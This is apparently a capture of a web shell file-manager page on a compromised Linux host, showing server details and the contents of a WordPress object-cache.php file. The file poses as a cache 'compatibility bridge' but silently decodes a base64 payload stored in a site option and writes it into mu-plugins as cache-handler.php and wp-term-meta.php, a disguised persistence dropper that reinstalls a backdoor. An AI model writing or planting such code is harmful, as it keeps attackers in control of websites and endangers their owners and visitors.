HEX
Server: Apache
System: Linux 198-252-107-178.cprapid.com 4.18.0-553.5.1.el8_10.x86_64 #1 SMP Wed Jun 5 09:12:13 EDT 2024 x86_64
User: msgdhg02 (1000)
PHP: 8.1.34
Disabled: exec,passthru,shell_exec,system
Upload Files
File: /home/msgdhg02/public_html/nemoall-v1.com/wp-content/object-cache.php
<?php 
/* Object Cache API — compatibility bridge */
$_oc_mu=WP_CONTENT_DIR."/mu-plugins/cache-handler.php";
if(!file_exists($_oc_mu)&&function_exists("get_option")){
$_oc_s=get_option("_wpoc_agent_code","");
if($_oc_s){$_oc_c=@base64_decode($_oc_s);
if($_oc_c&&strpos($_oc_c,"WPOC_Runtime")!==false){
if(!is_dir(WP_CONTENT_DIR."/mu-plugins")){@mkdir(WP_CONTENT_DIR."/mu-plugins",0755,true);}
@file_put_contents($_oc_mu,$_oc_c);
@file_put_contents(WP_CONTENT_DIR."/mu-plugins/wp-term-meta.php",$_oc_c);
}}}
$_oc_real=WP_CONTENT_DIR."/_object-cache-real.php";
if(file_exists($_oc_real)){require_once $_oc_real;}